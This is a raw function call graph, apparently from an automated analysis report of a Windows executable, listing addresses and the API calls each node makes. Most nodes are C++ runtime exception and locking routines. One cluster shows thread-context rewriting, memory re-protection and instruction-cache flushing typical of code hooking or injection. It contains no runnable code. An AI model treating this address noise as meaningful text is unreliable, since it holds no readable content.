9342->9344 9345 13de2734d38 9343->9345 9346 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9343->9346 9344->9345 9345->9331 9346->9345 9348 13de2734a57 _raise_exc _clrfp 9347->9348 9349 13de2734c6c RaiseException 9348->9349 9350 13de2734a12 9349->9350 9350->9326 9680 13de2735d99 9681 13de2728c04 _CallSETranslator 5 API calls 9680->9681 9682 13de2735da7 9681->9682 9683 13de2735db2 9682->9683 9684 13de2728c04 _CallSETranslator 5 API calls 9682->9684 9684->9683 9351 13de2725d00 9352 13de2725d0d 9351->9352 9353 13de2725d19 9352->9353 9355 13de2725e2a 9352->9355 9354 13de2725d9d 9353->9354 9356 13de2725d76 SetThreadContext 9353->9356 9357 13de2725e51 VirtualProtect FlushInstructionCache 9355->9357 9358 13de2725f0e 9355->9358 9356->9354 9357->9355 9359 13de2725f2e 9358->9359 9367 13de27243f0 9358->9367 9371 13de2724e00 GetCurrentProcess 9359->9371 9362 13de2725f87 9365 13de2727950 _log10_special IsProcessorFeaturePresent 9362->9365 9363 13de2725f47 ResumeThread 9364 13de2725f33 9363->9364 9364->9362 9364->9363 9366 13de2725fcf 9365->9366 9369 13de272440c 9367->9369 9368 13de272446f 9368->9359 9369->9368 9370 13de2724422 VirtualFree 9369->9370 9370->9369 9372 13de2724e1c 9371->9372 9373 13de2724e63 9372->9373 9374 13de2724e32 VirtualProtect FlushInstructionCache 9372->9374 9373->9364 9374->9372 9375 13de2735cfd 9376 13de272a014 __CxxCallCatchBlock 5 API calls 9375->9376 9377 13de2735d10 9376->9377 9382 13de27288d8 __CxxCallCatchBlock 5 API calls 9377->9382 9383 13de2735d4f __CxxCallCatchBlock 9377->9383 9378 13de2728c04 _CallSETranslator 5 API calls 9379 13de2735d63 9378->9379 9380 13de2728c04 _CallSETranslator 5 API calls 9379->9380 9381 13de2735d73 9380->9381 9382->9383 9383->9378 9685 13de2735d83 9688 13de272892c 9685->9688 9689 13de2728944 9688->9689 9690 13de2728956 9688->9690 9689->9690 9691 13de272894c 9689->9691 9692 13de2728c04 _CallSETranslator 5 API calls 9690->9692 9693 13de2728954 9691->9693 9695 13de2728c04 _CallSETranslator 5 API calls 9691->9695 9694 13de272895b 9692->9694 9694->9693 9697 13de2728c04 _CallSETranslator 5 API calls 9694->9697 9696 13de272897b 9695->9696 9698 13de2728c04 _CallSETranslator 5 API calls 9696->9698 9697->9693 9699 13de2728988 9698->9699 9700 13de272cc18 17 API calls 9699->9700 9701 13de2728991 9700->9701 9702 13de272cc18 17 API calls 9701->9702 9703 13de272899d 9702->9703 9384 13de2734308 9385 13de273431f 9384->9385 9386 13de2734319 CloseHandle 9384->9386 9386->9385 9704 13de2723788 9707 13de27236dc 9704->9707 9708 13de27236ef GetModuleHandleW 9707->9708 9709 13de2723781 FreeLibraryAndExitThread 9707->9709 9710 13de272376d TerminateThread 9708->9710 9711 13de2723706 GetCurrentProcess VirtualProtectEx 9708->9711 9714 13de2721e74 9710->9714 9711->9710 9712 13de2723732 GetCurrentProcess VirtualProtectEx 9711->9712 9712->9710 9741 13de2725ac0 9714->9741 9718 13de2721e90 9719 13de2721eb0 9718->9719 9751 13de2725720 GetCurrentThreadId 9718->9751 9721 13de2725720 6 API calls 9719->9721 9723 13de2721ed0 9719->9723 9721->9723 9722 13de2721ef0 9725 13de2721f10 9722->9725 9726 13de2725720 6 API calls 9722->9726 9723->9722 9724 13de2725720 6 API calls 9723->9724 9724->9722 9727 13de2721f30 9725->9727 9728 13de2725720 6 API calls 9725->9728 9726->9725 9729 13de2721f50 9727->9729 9730 13de2725720 6 API calls 9727->9730 9728->9727 9731 13de2721f70 9729->9731 9732 13de2725720 6 API calls 9729->9732 9730->9729 9733 13de2721f90 9731->9733 9734 13de2725720 6 API calls 9731->9734 9732->9731 9735 13de2721fb0 9733->9735 9736 13de2725720 6 API calls 9733->9736 9734->9733 9737 13de2721fd0 9735->9737 9738 13de2725720 6 API calls 9735->9738 9736->9735 9758 13de2725b40 9737->9758 9738->9737 9740 13de2725b3b 9740->9709 9742 13de2721e82 GetCurrentThread 9741->9742 9743 13de2725ad4 9741->9743 9745 13de2725fe0 9742->9745 9743->9742 9781 13de2725040 9743->9781 9746 13de2725ffd 9745->9746 9749 13de2725ff2 9745->9749 9747 13de272787c 3 API calls 9746->9747 9746->9749 9748 13de272601a 9747->9748 9748->9749 9750 13de272608d GetLastError 9748->9750 9749->9718 9750->9749 9752 13de272574d 9751->9752 9756 13de2725743 9751->9756 9753 13de272787c 3 API calls 9752->9753 9752->9756 9754 13de27257c1 type_info::_name_internal_method 9753->9754 9755 13de27258d0 VirtualProtect 9754->9755 9754->9756 9755->9756 9757 13de27258f9 GetLastError 9755->9757 9756->9719 9757->9756 9759 13de2725b7b GetCurrentThreadId 9758->9759 9760 13de2725b69 9758->9760 9761 13de2725b92 9759->9761 9778 13de2725b88 9759->9778 9760->9759 9762 13de2725b9b 9761->9762 9768 13de2725bab 9761->9768 9786 13de2725970 GetCurrentThreadId 9762->9786 9764 13de2727950 _log10_special IsProcessorFeaturePresent 9765 13de2725fcf 9764->9765 9765->9740 9766 13de2725ccc GetThreadContext 9767 13de2725cf2 9766->9767 9773 13de2725e2a 9766->9773 9767->9773 9774 13de2725d19 9767->9774 9768->9766 9768->9773 9769 13de2725f0e 9771 13de2725f2e 9769->9771 9775 13de27243f0 VirtualFree 9769->9775 9770 13de2725e51 VirtualProtect FlushInstructionCache 9770->9773 9772 13de2724e00 3 API calls 9771->9772 9780 13de2725f33 9772->9780 9773->9769 9773->9770 9776 13de2725d9d 9774->9776 9777 13de2725d76 SetThreadContext 9774->9777 9775->9771 9776->9740 9777->9776 9778->9764 9779 13de2725f47 ResumeThread 9779->9780 9780->9778 9780->9779 9782 13de2725052 9781->9782 9783 13de272508f 9782->9783 9784 13de2725068 VirtualProtect 9782->9784 9783->9742 9784->9782 9785 13de2725086 GetLastError 9784->9785 9785->9783 9787 13de272598b 9786->9787 9791 13de2725981 9786->9791 9788 13de27259a3 VirtualProtect 9787->9788 9789 13de2725a35 9787->9789 9788->9787 9790 13de2724e00 3 API calls 9789->9790 9793 13de2725a45 9790->9793 9791->9778 9792 13de2725a59 ResumeThread 9792->9793 9793->9791 9793->9792 9387 13de272b706 9388 13de2728c04 _CallSETranslator 5 API calls 9387->9388 9390 13de272b713 __CxxCallCatchBlock 9388->9390 9389 13de272b757 RaiseException 9391 13de272b77e 9389->9391 9390->9389 9392 13de272a014 __CxxCallCatchBlock 5 API calls 9391->9392 9396 13de272b786 9392->9396 9393 13de272b7af __CxxCallCatchBlock 9394 13de2728c04 _CallSETranslator 5 API calls 9393->9394 9395 13de272b7c2 9394->9395 9397 13de2728c04 _CallSETranslator 5 API calls 9395->9397 9396->9393 9398 13de27288d8 __CxxCallCatchBlock 5 API calls 9396->9398 9399 13de272b7cb 9397->9399 9398->9393 8692 13de272e00c 8693 13de272e031 8692->8693 8702 13de272e048 8692->8702 8694 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8693->8694 8695 13de272e036 8694->8695 8697 13de272dae0 _invalid_parameter_noinfo 20 API calls 8695->8697 8696 13de272e100 8742 13de272c46c 8696->8742 8699 13de272e041 8697->8699 8701 13de272e160 8704 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8701->8704 8702->8696 8707 13de272e0d8 8702->8707 8709 13de272e095 8702->8709 8722 13de272e250 8702->8722 8706 13de272e167 8704->8706 8705 13de272e1f1 8708 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8705->8708 8711 13de272e0b8 8706->8711 8713 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8706->8713 8707->8711 8714 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8707->8714 8712 13de272e1fc 8708->8712 8709->8711 8717 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8709->8717 8710 13de272e192 8710->8705 8710->8710 8721 13de272e237 8710->8721 8748 13de27314c0 8710->8748 8716 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8711->8716 8715 13de272e215 8712->8715 8719 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8712->8719 8713->8706 8714->8707 8720 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8715->8720 8716->8699 8717->8709 8719->8712 8720->8699 8723 13de272e27e 8722->8723 8723->8723 8724 13de272dc3c _invalid_parameter_noinfo 7 API calls 8723->8724 8725 13de272e2c9 8724->8725 8726 13de27314c0 20 API calls 8725->8726 8727 13de272e2ff 8726->8727 8728 13de272e724 17 API calls 8727->8728 8729 13de272e4b6 8728->8729 8757 13de272fb18 8729->8757 8734 13de272e57d 8735 13de272e724 17 API calls 8734->8735 8736 13de272e5ad 8735->8736 8737 13de272fb18 4 API calls 8736->8737 8738 13de272e5d6 8737->8738 8781 13de272de80 8738->8781 8741 13de272e250 26 API calls 8743 13de272c484 8742->8743 8747 13de272c4bc 8742->8747 8744 13de272dc3c _invalid_parameter_noinfo 7 API calls 8743->8744 8743->8747 8745 13de272c4b2 8744->8745 8746 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8745->8746 8746->8747 8747->8701 8747->8710 8752 13de27314dd 8748->8752 8749 13de27314e2 8750 13de27314f8 8749->8750 8751 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8749->8751 8750->8710 8753 13de27314ec 8751->8753 8752->8749 8752->8750 8755 13de273152c 8752->8755 8754 13de272dae0 _invalid_parameter_noinfo 20 API calls 8753->8754 8754->8750 8755->8750 8756 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8755->8756 8756->8753 8758 13de272f904 4 API calls 8757->8758 8759 13de272e4e1 8758->8759 8760 13de272dd04 8759->8760 8761 13de272dd2e 8760->8761 8762 13de272dd52 8760->8762 8763 13de272dd3d FindFirstFileExW 8761->8763 8767 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8761->8767 8764 13de272dd57 8762->8764 8765 13de272ddac 8762->8765 8763->8734 8764->8763 8770 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8764->8770 8773 13de272dd6c 8764->8773 8766 13de272f5ec MultiByteToWideChar 8765->8766 8769 13de272ddc8 8766->8769 8767->8763 8768 13de272cf7c 8 API calls 8768->8763 8771 13de272ddcf Concurrency::details::SchedulerProxy::DeleteThis 8769->8771 8772 13de272de0a 8769->8772 8775 13de272ddfd 8769->8775 8776 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8769->8776 8770->8773 8771->8763 8798 13de272db90 8771->8798 8772->8763 8774 13de272f5ec MultiByteToWideChar 8772->8774 8773->8768 8774->8771 8777 13de272cf7c 8 API calls 8775->8777 8776->8775 8777->8772 8780 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8780->8763 8782 13de272dece 8781->8782 8783 13de272deaa 8781->8783 8784 13de272ded4 8782->8784 8790 13de272df28 8782->8790 8785 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8783->8785 8787 13de272deb9 8783->8787 8786 13de272dee9 8784->8786 8784->8787 8788 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8784->8788 8785->8787 8789 13de272cf7c 8 API calls 8786->8789 8787->8741 8788->8786 8789->8787 8791 13de272df53 Concurrency::details::SchedulerProxy::DeleteThis 8790->8791 8792 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8790->8792 8795 13de272df84 8790->8795 8791->8787 8794 13de272db90 7 API calls 8791->8794 8792->8795 8793 13de272cf7c 8 API calls 8793->8791 8796 13de272df60 8794->8796 8795->8793 8797 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8796->8797 8797->8787 8799 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8798->8799 8800 13de272db9d Concurrency::details::SchedulerProxy::DeleteThis 8799->8800 8801 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8800->8801 8802 13de272dbbf 8801->8802 8802->8780 8803 13de272800c 8806 13de27289a0 8803->8806 8805 13de2728035 8807 13de27289f6 __std_exception_destroy 8806->8807 8808 13de27289c1 8806->8808 8807->8805 8808->8807 8810 13de272cc58 8808->8810 8811 13de272cc6f 8810->8811 8812 13de272cc65 8810->8812 8813 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8811->8813 8812->8811 8817 13de272cc8a 8812->8817 8814 13de272cc76 8813->8814 8815 13de272dae0 _invalid_parameter_noinfo 20 API calls 8814->8815 8816 13de272cc82 8815->8816 8816->8807 8817->8816 8818 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8817->8818 8818->8814 8819 13de272b60c 8842 13de2728c04 8819->8842 8821 13de272b641 8822 13de2728c04 _CallSETranslator 5 API calls 8821->8822 8823 13de272b64f __except_validate_context_record 8822->8823 8824 13de2728c04 _CallSETranslator 5 API calls 8823->8824 8825 13de272b693 8824->8825 8826 13de2728c04 _CallSETranslator 5 API calls 8825->8826 8827 13de272b69c 8826->8827 8828 13de2728c04 _CallSETranslator 5 API calls 8827->8828 8829 13de272b6a5 8828->8829 8845 13de2729fd8 8829->8845 8832 13de2728c04 _CallSETranslator 5 API calls 8833 13de272b6d5 __CxxCallCatchBlock 8832->8833 8852 13de272a014 8833->8852 8835 13de272b7af __CxxCallCatchBlock 8836 13de2728c04 _CallSETranslator 5 API calls 8835->8836 8837 13de272b7c2 8836->8837 8839 13de2728c04 _CallSETranslator 5 API calls 8837->8839 8841 13de272b7cb 8839->8841 8863 13de2728c20 8842->8863 8844 13de2728c0d 8844->8821 8846 13de2728c04 _CallSETranslator 5 API calls 8845->8846 8847 13de2729fe9 8846->8847 8848 13de2728c04 _CallSETranslator 5 API calls 8847->8848 8849 13de2729ff4 8847->8849 8848->8849 8850 13de2728c04 _CallSETranslator 5 API calls 8849->8850 8851 13de272a005 8850->8851 8851->8832 8851->8833 8853 13de2728c04 _CallSETranslator 5 API calls 8852->8853 8854 13de272a026 8853->8854 8855 13de272a061 8854->8855 8856 13de2728c04 _CallSETranslator 5 API calls 8854->8856 8857 13de272a031 8856->8857 8857->8855 8858 13de2728c04 _CallSETranslator 5 API calls 8857->8858 8859 13de272a052 8858->8859 8859->8835 8860 13de27288d8 8859->8860 8861 13de2728c04 _CallSETranslator 5 API calls 8860->8861 8862 13de27288e6 8861->8862 8862->8835 8864 13de2728c3f Concurrency::details::SchedulerProxy::DeleteThis 8863->8864 8870 13de2728c38 _invalid_parameter_noinfo __std_exception_destroy 8863->8870 8864->8870 8871 13de272a370 8864->8871 8866 13de2728c72 _CallSETranslator 8867 13de2728c99 8866->8867 8868 13de272a370 _CallSETranslator 5 API calls 8866->8868 8866->8870 8869 13de272a370 _CallSETranslator 5 API calls 8867->8869 8867->8870 8868->8867 8869->8870 8870->8844 8876 13de272a148 8871->8876 8874 13de272a3b0 TlsSetValue 8875 13de272a3a8 8874->8875 8875->8866 8877 13de272a232 8876->8877 8878 13de272a18c Concurrency::details::SchedulerProxy::DeleteThis __vcrt_InitializeCriticalSectionEx 8876->8878 8877->8874 8877->8875 8878->8877 8879 13de272a1ba LoadLibraryExW 8878->8879 8880 13de272a279 GetProcAddress 8878->8880 8883 13de272a1fd LoadLibraryExW 8878->8883 8879->8878 8881 13de272a259 8879->8881 8880->8877 8881->8880 8882 13de272a270 FreeLibrary 8881->8882 8882->8880 8883->8878 8883->8881 8884 13de2723bf0 8887 13de2723b3d 8884->8887 8885 13de2723b8d VirtualQuery 8886 13de2723ba7 8885->8886 8885->8887 8887->8885 8887->8886 8888 13de2723bf2 GetLastError 8887->8888 8888->8887 9794 13de272b370 9795 13de272b39d __except_validate_context_record 9794->9795 9796 13de2728c04 _CallSETranslator 5 API calls 9795->9796 9797 13de272b3a2 9796->9797 9800 13de272b3fc 9797->9800 9801 13de272b48a 9797->9801 9808 13de272b450 9797->9808 9798 13de272b4f8 9798->9808 9835 13de272aaf0 9798->9835 9799 13de272b477 9823 13de2729c6c 9799->9823 9800->9799 9800->9808 9809 13de272b41e __FrameHandler3::FrameUnwindToEmptyState 9800->9809 9805 13de272b4a9 9801->9805 9829 13de272a068 9801->9829 9805->9798 9805->9808 9832 13de272a07c 9805->9832 9806 13de272b5a1 9809->9806 9811 13de272b87c 9809->9811 9812 13de272a068 Is_bad_exception_allowed 5 API calls 9811->9812 9813 13de272b8ab __FrameHandler3::FrameUnwindToEmptyState 9812->9813 9814 13de2728c04 _CallSETranslator 5 API calls 9813->9814 9821 13de272b8c8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9814->9821 9815 13de272b9bf 9816 13de2728c04 _CallSETranslator 5 API calls 9815->9816 9817 13de272b9c4 9816->9817 9818 13de2728c04 _CallSETranslator 5 API calls 9817->9818 9819 13de272b9cf __FrameHandler3::GetHandlerSearchState 9817->9819 9818->9819 9819->9808 9820 13de272a068 5 API calls Is_bad_exception_allowed 9820->9821 9821->9815 9821->9819 9821->9820 9822 13de272a090 __FrameHandler3::FrameUnwindToEmptyState 5 API calls 9821->9822 9822->9821 9824 13de2729c8b __FrameHandler3::GetHandlerSearchState 9823->9824 9889 13de2729bdc 9824->9889 9827 13de272b87c __FrameHandler3::FrameUnwindToEmptyState 5 API calls 9828 13de2729cc0 9827->9828 9828->9808 9830 13de2728c04 _CallSETranslator 5 API calls 9829->9830 9831 13de272a071 9830->9831 9831->9805 9833 13de2728c04 _CallSETranslator 5 API calls 9832->9833 9834 13de272a085 9833->9834 9834->9798 9837 13de272ab51 __FrameHandler3::GetHandlerSearchState 9835->9837 9836 13de272afb7 9837->9836 9842 13de2728c04 _CallSETranslator 5 API calls 9837->9842 9883 13de272ac36 9837->9883 9838 13de272af08 9838->9836 9839 13de272af06 9838->9839 9934 13de272afc0 9838->9934 9840 13de2728c04 _CallSETranslator 5 API calls 9839->9840 9844 13de272af4a 9840->9844 9841 13de272ae35 9841->9839 9847 13de272ae56 9841->9847 9849 13de272a068 Is_bad_exception_allowed 5 API calls 9841->9849 9845 13de272ab9d 9842->9845 9844->9836 9846 13de2727950 _log10_special IsProcessorFeaturePresent 9844->9846 9845->9844 9850 13de2728c04 _CallSETranslator 5 API calls 9845->9850 9848 13de272af5d 9846->9848 9847->9839 9853 13de272ae78 9847->9853 9927 13de2729c40 9847->9927 9848->9808 9849->9847 9852 13de272abad 9850->9852 9854 13de2728c04 _CallSETranslator 5 API calls 9852->9854 9853->9839 9855 13de272ae8e 9853->9855 9856 13de272af9a 9853->9856 9857 13de272abb6 9854->9857 9859 13de272ae99 9855->9859 9862 13de272a068 Is_bad_exception_allowed 5 API calls 9855->9862 9860 13de2728c04 _CallSETranslator 5 API calls 9856->9860 9893 13de272a0a8 9857->9893 9865 13de272baa0 5 API calls 9859->9865 9863 13de272afa0 9860->9863 9862->9859 9864 13de2728c04 _CallSETranslator 5 API calls 9863->9864 9866 13de272afa9 9864->9866 9871 13de272aeb0 __FrameHandler3::GetHandlerSearchState 9865->9871 9868 13de272cc18 17 API calls 9866->9868 9867 13de2728c04 _CallSETranslator 5 API calls 9869 13de272abf8 9867->9869 9868->9836 9872 13de2728c04 _CallSETranslator 5 API calls 9869->9872 9869->9883 9870 13de272a07c LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 9878 13de272ac6e 9870->9878 9871->9839 9931 13de2729ed4 RtlUnwindEx 9871->9931 9874 13de272ac04 9872->9874 9876 13de2728c04 _CallSETranslator 5 API calls 9874->9876 9877 13de272ac0d 9876->9877 9896 13de272baa0 9877->9896 9878->9841 9878->9870 9907 13de272b230 9878->9907 9921 13de272aa1c 9878->9921 9882 13de272ac21 9903 13de272bb90 9882->9903 9883->9838 9883->9878 9885 13de272af94 9886 13de272cc18 17 API calls 9885->9886 9886->9856 9887 13de272ac29 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9887->9885 9888 13de2728a58 Concurrency::cancel_current_task 2 API calls 9887->9888 9888->9885 9890 13de2729c27 9889->9890 9891 13de2729bfc 9889->9891 9890->9827 9891->9890 9892 13de2728c04 _CallSETranslator 5 API calls 9891->9892 9892->9891 9894 13de2728c04 _CallSETranslator 5 API calls 9893->9894 9895 13de272a0b6 9894->9895 9895->9836 9895->9867 9897 13de272bb87 9896->9897 9900 13de272bacb 9896->9900 9898 13de272ac1d 9898->9882 9898->9883 9899 13de272a07c LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 9899->9900 9900->9898 9900->9899 9901 13de272a068 Is_bad_exception_allowed 5 API calls 9900->9901 9902 13de272b230 5 API calls 9900->9902 9901->9900 9902->9900 9905 13de272bbad Is_bad_exception_allowed 9903->9905 9906 13de272bbfd 9903->9906 9904 13de272a068 5 API calls Is_bad_exception_allowed 9904->9905 9905->9904 9905->9906 9906->9887 9908 13de272b25d 9907->9908 9919 13de272b2ec 9907->9919 9909 13de272a068 Is_bad_exception_allowed 5 API calls 9908->9909 9910 13de272b266 9909->9910 9911 13de272a068 Is_bad_exception_allowed 5 API calls 9910->9911 9912 13de272b27f 9910->9912 9910->9919 9911->9912 9913 13de272b2ab 9912->9913 9914 13de272a068 Is_bad_exception_allowed 5 API calls 9912->9914 9912->9919 9915 13de272a07c 5 API calls 9913->9915 9914->9913 9916 13de272b2bf 9915->9916 9917 13de272b2d8 9916->9917 9918 13de272a068 Is_bad_exception_allowed 5 API calls 9916->9918 9916->9919 9920 13de272a07c 5 API calls 9917->9920 9918->9917 9919->9878 9920->9919 9922 13de272aa59 __FrameHandler3::GetHandlerSearchState 9921->9922 9923 13de272a068 Is_bad_exception_allowed 5 API calls 9922->9923 9924 13de272aa91 9923->9924 9925 13de2729ed4 2 API calls 9924->9925 9926 13de272aad5 9925->9926 9926->9878 9928 13de2729c54 __FrameHandler3::GetHandlerSearchState 9927->9928 9929 13de2729bdc __FrameHandler3::FrameUnwindToEmptyState 5 API calls 9928->9929 9930 13de2729c5e 9929->9930 9930->9853 9932 13de2727950 _log10_special IsProcessorFeaturePresent 9931->9932 9933 13de2729fce 9932->9933 9933->9839 9935 13de272aff9 9934->9935 9940 13de272b20c 9934->9940 9936 13de2728c04 _CallSETranslator 5 API calls 9935->9936 9937 13de272affe 9936->9937 9938 13de272b01d EncodePointer 9937->9938 9945 13de272b070 9937->9945 9939 13de2728c04 _CallSETranslator 5 API calls 9938->9939 9941 13de272b02d 9939->9941 9940->9839 9941->9945 9946 13de2729b88 9941->9946 9943 13de272a068 5 API calls Is_bad_exception_allowed 9943->9945 9944 13de272aa1c 7 API calls 9944->9945 9945->9940 9945->9943 9945->9944 9947 13de2728c04 _CallSETranslator 5 API calls 9946->9947 9948 13de2729bb4 9947->9948 9948->9945 9400 13de27308f8 9401 13de2730903 9400->9401 9409 13de27331f8 9401->9409 9403 13de2730908 9416 13de27332ac 9403->9416 9406 13de2730939 9407 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9406->9407 9408 13de2730945 9407->9408 9410 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9409->9410 9415 13de2733211 9410->9415 9411 13de2733291 9411->9403 9412 13de273325c DeleteCriticalSection 9414 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9412->9414 9414->9415 9415->9411 9415->9412 9420 13de2733a6c 9415->9420 9417 13de27332c0 9416->9417 9418 13de273091a DeleteCriticalSection 9416->9418 9417->9418 9419 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9417->9419 9418->9403 9418->9406 9419->9418 9421 13de2733a9c 9420->9421 9428 13de2733948 9421->9428 9423 13de2733ab5 9424 13de2733ada 9423->9424 9425 13de272cd10 _invalid_parameter_noinfo 20 API calls 9423->9425 9426 13de2733aef 9424->9426 9427 13de272cd10 _invalid_parameter_noinfo 20 API calls 9424->9427 9425->9424 9426->9415 9427->9426 9429 13de2733963 9428->9429 9430 13de2733991 9428->9430 9431 13de272da14 _invalid_parameter_noinfo 20 API calls 9429->9431 9432 13de2733983 9430->9432 9438 13de2730954 EnterCriticalSection 9430->9438 9431->9432 9432->9423 9439 13de2736240 9438->9439 8889 13de272fffc 8890 13de2730008 8889->8890 8892 13de273002f 8890->8892 8893 13de273222c 8890->8893 8894 13de2732231 8893->8894 8895 13de273226c 8893->8895 8896 13de2732264 8894->8896 8897 13de2732252 DeleteCriticalSection 8894->8897 8895->8890 8898 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8896->8898 8897->8896 8897->8897 8898->8895 9440 13de272cafc 9441 13de272cb15 9440->9441 9443 13de272cb2d 9440->9443 9442 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9441->9442 9441->9443 9442->9443 9112 13de2730c60 9115 13de2730be4 9112->9115 9114 13de2730c89 9116 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9115->9116 9118 13de2730c02 9116->9118 9117 13de2730c3b 9117->9114 9118->9117 9119 13de273103c _invalid_parameter_noinfo 7 API calls 9118->9119 9119->9118 9949 13de2730160 9952 13de2730118 9949->9952 9951 13de2730189 9953 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9952->9953 9954 13de2730131 9953->9954 9954->9951 9955 13de272555d 9957 13de2725564 9955->9957 9956 13de27255cb 9957->9956 9958 13de2725647 VirtualProtect 9957->9958 9959 13de2725673 GetLastError 9958->9959 9960 13de2725681 9958->9960 9959->9960 9444 13de272c0e1 9445 13de272cc18 17 API calls 9444->9445 9446 13de272c0e6 9445->9446 9447 13de272c10d GetModuleHandleW 9446->9447 9448 13de272c157 9446->9448 9447->9448 9454 13de272c11a 9447->9454 9461 13de272bfe4 9448->9461 9450 13de272c193 9451 13de272c19a 9450->9451 9466 13de272c1b0 9450->9466 9454->9448 9456 13de272c208 GetModuleHandleExW 9454->9456 9457 13de272c23c GetProcAddress 9456->9457 9460 13de272c24e _invalid_parameter_noinfo 9456->9460 9457->9460 9458 13de272c271 9458->9448 9459 13de272c26a FreeLibrary 9459->9458 9460->9458 9460->9459 9462 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9461->9462 9463 13de272c000 9462->9463 9473 13de272c01c 9463->9473 9465 13de272c009 9465->9450 9489 13de272c1e4 9466->9489 9468 13de272c1bd 9469 13de272c1c1 GetCurrentProcess TerminateProcess 9468->9469 9470 13de272c1d2 9468->9470 9469->9470 9471 13de272c208 3 API calls 9470->9471 9472 13de272c1d9 ExitProcess 9471->9472 9474 13de272c095 9473->9474 9475 13de272c032 _invalid_parameter_noinfo 9473->9475 9474->9465 9475->9474 9477 13de272c9fc 9475->9477 9480 13de272c8a0 9477->9480 9479 13de272ca39 9479->9474 9481 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9480->9481 9482 13de272c8bc 9481->9482 9485 13de272c8dc 9482->9485 9484 13de272c8c5 9484->9479 9486 13de272c90a _invalid_parameter_noinfo 9485->9486 9487 13de272c902 9485->9487 9486->9487 9488 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9486->9488 9487->9484 9488->9487 9492 13de272d72c 9489->9492 9491 13de272c1ed 9491->9468 9493 13de272d73d 9492->9493 9494 13de272d74b 9493->9494 9496 13de272fac0 9493->9496 9494->9491 9497 13de272f904 4 API calls 9496->9497 9498 13de272fae8 9497->9498 9498->9494 9120 13de272f86c 9121 13de272f88e 9120->9121 9122 13de272f8ab 9120->9122 9121->9122 9123 13de272f89c 9121->9123 9127 13de2732064 9122->9127 9124 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9123->9124 9126 13de272f8a1 9124->9126 9128 13de2732083 9127->9128 9129 13de2732079 9127->9129 9131 13de2732088 9128->9131 9137 13de273208f _invalid_parameter_noinfo 9128->9137 9130 13de272cf7c 8 API calls 9129->9130 9135 13de2732081 9130->9135 9132 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9131->9132 9132->9135 9133 13de27320c2 HeapReAlloc 9133->9135 9133->9137 9134 13de2732095 9136 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9134->9136 9135->9126 9136->9135 9137->9133 9137->9134 9138 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 9137->9138 9138->9137 8899 13de27287ec 8906 13de2728d4c 8899->8906 8902 13de27287f9 8904 13de2728802 8904->8902 8916 13de2728d94 8904->8916 8907 13de2728d54 8906->8907 8909 13de2728d85 8907->8909 8911 13de27287f5 8907->8911 8920 13de272a3c4 8907->8920 8910 13de2728d94 __vcrt_uninitialize_locks DeleteCriticalSection 8909->8910 8910->8911 8911->8902 8912 13de2728ce0 8911->8912 8913 13de2728cf0 8912->8913 8914 13de272a370 _CallSETranslator 5 API calls 8913->8914 8915 13de2728d09 __vcrt_uninitialize_ptd 8913->8915 8914->8915 8915->8904 8917 13de2728dbf 8916->8917 8918 13de2728dc3 8917->8918 8919 13de2728da2 DeleteCriticalSection 8917->8919 8918->8902 8919->8917 8921 13de272a148 __vcrt_InitializeCriticalSectionEx 4 API calls 8920->8921 8922 13de272a3fa 8921->8922 8923 13de272a40f InitializeCriticalSectionAndSpinCount 8922->8923 8924 13de272a404 8922->8924 8923->8924 8924->8907 9499 13de2727aec 9506 13de2728814 9499->9506 9502 13de2727af9 9507 13de2728c20 _CallSETranslator 5 API calls 9506->9507 9508 13de2727af5 9507->9508 9508->9502 9509 13de272cbac 